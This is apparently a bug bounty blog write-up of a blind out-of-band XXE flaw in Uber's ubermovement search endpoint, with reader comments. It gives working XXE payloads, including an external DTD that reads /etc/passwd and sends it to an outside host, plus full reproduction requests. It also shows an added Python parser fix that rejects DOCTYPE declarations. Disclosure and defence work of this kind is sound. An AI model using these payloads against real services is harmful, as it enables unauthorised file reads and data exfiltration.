Blind OOB XXE at UBER: 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. The attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of UBER'S websites that was in the Bug Bounty Program scope.

On the evening of July 26th 2016 I was working on the ubermovement web application.
As it was a small webapp there were not many parameters to run injection tests against. I started the old-school tests and the first parameter I came across was the search box.


Now, I attached my Burp Suite, gave a keyword to search and started monitoring the requests...

In the directory "search" I got two requests:
1. The keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now, for the first request I started the attacks like XSS, SQL, XPATH, XXE, command injection and many more.....

But they all failed and I didn't find any vulnerability.

Now I started my tests with the second request...

As there were no parameters, I sent the request to Repeater and started looking for directory-based vulnerabilities.

Then, as all my other injection tests failed, lastly I started looking for XXE.

So, the first thing I did was change the request method to POST and check the response.



As the response was the same as for the GET request, I added the Content-type header as application/xml
and basic XML code with "GeneralSearch" as the search parameter, then checked the response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The response was shocking: I got an XML error.

Now I was about 60% sure that it could lead to XXE. So I started the blind test for XXE
with different payloads...
Eg.

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But still no luck; all I was getting was the XML error in the response....

Now I thought, let's check the vulnerability via the OOB (out-of-band) method and perform a ping test.

So,
step-1 : I downloaded XAMPP and hosted an Apache server.
step-2 : I port forwarded my IP on port 80 so I could access my server via my public IP from different networks.
step-3 : I edited the XXE payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.

step-5 : I checked my server logs and I got a perfect ping from the vulnerable application.




Now the manual test confirmed the vulnerability, so I scanned the particular vulnerable request via Acunetix and it detected the vulnerability.

Then I reported the bug first and then started doing further tests with .dtd payloads.

It turned out that various sub-domains of *.ubermovement.com had the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/, which indicates that this script is vulnerable to XXE injection.
NOTE : As it was a blind XXE test, I was successful in the ping test for XXE but unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to the website : http://ubermovement.com/
  2. Attach Burp Suite & start intercepting. Now click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

  4. Now send the request to Repeater & change it to POST.

    Eg. Request changed to POST :

    POST /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Content-Length: 173
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

  5. Now add the content type : Eg. Content-type: application/xml

    Request will be :

    POST /api/search/GeneralSearch HTTP/1.1
    Content-type: application/xml
    Host: ubermovement.com
    Content-Length: 173
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*

  6. Deploy a web server and host the "payload.dtd" file, eg :

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;

  7. Now add the XXE payload for confirmation :

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload23.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

    Request will be :

    POST /api/search/GeneralSearch HTTP/1.1
    Content-type: application/xml
    Host: ubermovement.com
    Content-Length: 214
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

NOTE : If you view your web server logs you will find a 404 error.
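The parser-side fix, as an added example that is not code from the original post or from Uber: every payload above needs a <!DOCTYPE ...> to declare its entities, so a parser that refuses any DOCTYPE before entities can be declared or resolved defeats the inline, parameter-entity and external-DTD variants alike. The server here was Java (User agent: Java/1.8.0_60), where the same rule is DocumentBuilderFactory's http://apache.org/xml/features/disallow-doctype-decl feature; this Python version uses the stdlib expat binding, and the request bodies are constructed for the example, mirroring the payloads quoted on this page.

```python
# Added example (not the post's or Uber's code): reject any DTD before an ENTITY can
# be declared, the same rule as Java's "disallow-doctype-decl" feature.
import xml.parsers.expat


class DoctypeRejected(ValueError):
    pass


def parse_search_body(body: bytes) -> str:
    """Return the search term inside <GeneralSearch>...</GeneralSearch>."""
    parser = xml.parsers.expat.ParserCreate()
    state = {"root": None, "inside": False, "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at the opening of <!DOCTYPE ...>, so the entity declarations inside
        # it (and any SYSTEM URI they point at) are never processed.
        raise DoctypeRejected("DOCTYPE %r is not allowed in a search request" % name)

    def on_start(tag, attrs):
        if state["root"] is None:
            state["root"] = tag
        state["inside"] = tag == "GeneralSearch"

    def on_chars(data):
        if state["inside"]:
            state["text"].append(data)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = lambda tag: state.update(inside=False)
    parser.CharacterDataHandler = on_chars
    parser.Parse(body, True)  # ExpatError on malformed XML (the "XML Error" in the post)
    if state["root"] != "GeneralSearch":
        raise ValueError("unexpected root element %r" % state["root"])
    return "".join(state["text"])


def check_request(body: bytes) -> str:
    """Log-friendly verdict: 'accepted:<term>' or 'rejected:<reason>'."""
    try:
        return "accepted:" + parse_search_body(body)
    except DoctypeRejected as exc:
        return "rejected:" + str(exc)


# Constructed request bodies; the DOCTYPE ones mirror payloads quoted in the post.
BENIGN = b'<?xml version="1.0" encoding="utf-8"?><GeneralSearch>cat</GeneralSearch>'
INLINE_ENTITY = (b'<?xml version="1.0"?><!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM '
                 b'"file:///etc/passwd"> ]><GeneralSearch>&xxe;</GeneralSearch>')
PARAM_ENTITY = (b'<?xml version="1.0"?><!DOCTYPE roottag [ <!ENTITY % dtd SYSTEM '
                b'"http://0.0.0.0/payload.dtd"> %dtd;]><GeneralSearch>&send;</GeneralSearch>')
```

Because the rejection happens in the DOCTYPE handler, the 404 (or any hit at all) described in the NOTE above never appears in the attacker's web server logs; a parser configured this way also gives the application a clean place to log the rejected request.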

Comments

  1. I hope next time they will pay more than $500.
  2. Hey, how did you forward the port where you hosted the dtd file which you gave? XAMPP would be running on your local machine, then how did you get back a ping from Uber's server to your server? I mean, which address did you use, your public IP?

    Replies
    1. Steps for port forwarding :
      ---------------------------
      NOTE : Before performing this, make sure that you can access your public IP from different networks. To know your public IP, go to Google search and type "my ip".

      1. Install XAMPP and run the Apache server on your system.
      2. Open the Apache configuration file "C:\xampp\apache\conf\httpd.conf"
      3. Now make a rule "Listen :"
      Eg. Listen 192.168.1.203:80
      The idea is to run your server locally first. IP : should be your local IP.
      To obtain your local IP use the command : "Windows":"ipconfig" & "Linux":"ifconfig"
      4. When the IP is set, restart the server.
      5. Now open your router.
      NOTE : Most routers have an advanced feature called NAT or Port forwarding or "create virtual server". So you have to check for it.
      6. For forwarding the PORT :
      Eg. I have a D-Link router, so
      a. there was a tab called Port forwarding. Click on it.
      b. Choose the task to perform from the check list, eg. run http server.
      c. Give your local IP and the port to be forwarded.

      Eg.
      IP : 192.168.1.203
      Port : 80
      Forward port : 80

      See : http://portforward.com/

      -----------------------------

      You have to host the .dtd payload on your local XAMPP server.

      ------------------------------

      For getting the PING back from Uber I used my public IP, meaning that after the port forwarding process my local server became global, so I can use my server from anywhere in the world with the help of the public IP. In other words, I hosted XAMPP on my public IP so it acted like any other website.
  3. Can you make a video for any other site for XXE, or do you have any so we can refer to it with each and every single step?
  5. Sir, you have explained very nicely... is there any other bug that you have found and posted the steps for on the blog? Please give us the link.
  9. This was an awesome guess. Nice, bro!
